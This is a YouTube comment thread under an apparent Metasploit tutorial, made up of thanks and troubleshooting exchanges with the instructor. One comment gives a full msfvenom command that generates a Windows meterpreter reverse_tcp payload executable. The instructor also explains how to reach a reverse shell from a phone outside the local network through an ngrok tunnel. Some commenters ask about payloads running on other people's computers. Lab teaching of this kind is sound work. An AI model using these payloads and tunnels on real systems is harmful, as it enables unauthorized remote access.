Thank you for not assuming we actually have a clue and taking the time to explain everything so simply!
@krah80525 ай бұрын
You're welcome.
@chadurdy75553 жыл бұрын
🙈😎🙏🏾🙇🏽♂️🙏🏾 YOU ARE THE MAN!!! Thank you thank you thank you Professor K!! So concise and even toned exact presentation of guided steps. Literally from zero to end goal no fluff. Again thank you.
@chadurdy75553 жыл бұрын
And I used windows 10!! As a target vmachine! Such masterful guidance.
@krah80523 жыл бұрын
Thanks!
@aritmistri82902 жыл бұрын
Sir please help me how can i solve my metasploit session closed
@Dion8-sp3zk Жыл бұрын
very clear tutorial! thank you sir.
@Dede-id4cv Жыл бұрын
hello '' [*] Exploit completed, but no session was created. I get the error ' How can I fix it?
@Krz--ze4tl2 жыл бұрын
THANK YOU SO MUCH YOU ARE PROFESSIONAL🙏🙏
@krah80522 жыл бұрын
Thank you!
@mandamiddle02782 жыл бұрын
hoooly the voice so american based love that nice video KKONAW
@ellsi6372 Жыл бұрын
Thank you professor 🙏
@Yessir746802 жыл бұрын
I launched the meterpreter session and I ran the payload exe file and the meterpreter is taking forever to connect, even after clicking the payload exe file
@scammersexploited2 жыл бұрын
How to you upgrade windows shell to meterpreter the msf module shell to meterpreter isn't working is their another module I can use ?
@musaalom3503 ай бұрын
hello professor, I am facing a problem. I want to discuss this with you. How is this possible?
@lutfianam18892 жыл бұрын
how so that when there is a session or target trapped can be directly executed without us having to type?
@FadiCherif Жыл бұрын
It working in my computer only but if any computer open the file it doesnt work
@EM-do1yi3 жыл бұрын
thank you for this vid !
@krah80523 жыл бұрын
You're welcome!
@vivianxia45322 жыл бұрын
THANK YOU!!!!
@felisclarke80903 жыл бұрын
Hey professor K i’m new to kali Linux and I’m watching your video on how to open a meterpreter session but.. when I enter the first line of command -f is highlighted red, and does not work. I’m using Root@kali Thanks if you can help
@krah80523 жыл бұрын
Took some troubleshooting but the issue is kali will not accept the syntax for the -f if you copy and paste it into the CLI. You have to type in the entire command one letter at a time. I did confirm that this is the issue. Never had that issue before until the latest Kali update.
@felisclarke80903 жыл бұрын
@@krah8052 thank you for getting back to me, I did type the syntax by hand 1 letter at a time but still doesn’t work I wrote it like this: msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx LPORT=4444 -f exe -o payload.exe But still -f is highlighted red?
@felisclarke80903 жыл бұрын
@@krah8052
@krah80523 жыл бұрын
@@felisclarke8090 If you type in the command leave the -f as is and you press enter, does the response come back showing a bunch of strange characters? If so, that is because the BASH shell is not taking either the letter - or the letter f using the current source or formatting for your text. It could be your keyboard layout. I've had this problem in the past where I had to open a text editor such as nano and type in the command. Change to the code type to something that the BASH shell would take. I was then able to copy and paste the command into the CLI.
@felisclarke80903 жыл бұрын
@@krah8052 yes when I press enter on the syntax it does not save payload.exe and I get a spam of weird shapes and characters and symbols? Very strange
@felisclarke80903 жыл бұрын
Ls-l is also saids command not found, any help would be greatly appreciated
@krah80523 жыл бұрын
You fat-fingered the syntax. You are missing the space between the letter s and the -I like so, ls -I.
@doomgloom78503 жыл бұрын
Can u make tutorial on persitence payload on android?
@@krah8052 have tried it thousands times. Didnt work
@krah80523 жыл бұрын
@@doomgloom7850 That's why I don't bother with making the lab. Most of the tutorials on the subject take you to the 99-yard line and drop off without crossing the finish line or completing the hack. Either that or they demonstrate the hack using an internal network. Hackersploit and other like channels don't bother with these types of labs because of the difficulty in getting them to work. Getting a reverse shell from a phone without first going through a web server on the Internet is not going to work. That's where this type of hack breaks down. The command and control to receive the reverse shell must be available on the Internet. If you are sitting behind a NAT network or a firewall, the hack will not work. For this, you would first need to direct the response from the phone to a secure tunnel on the Internet. You could then access the tunnel using a web page. ngrok.com/ tunnel.staqlab.com/ I demonstrate this in the following lab using a simple reverse shell. www.dropbox.com/s/thwrdy0bmayabno/Lab%20%20-%20Accessing%20Kali%20Across%20the%20WAN%20with%20NGROK.pdf?dl=0 kzbin.info/www/bejne/pqi3o4l3YriNgM0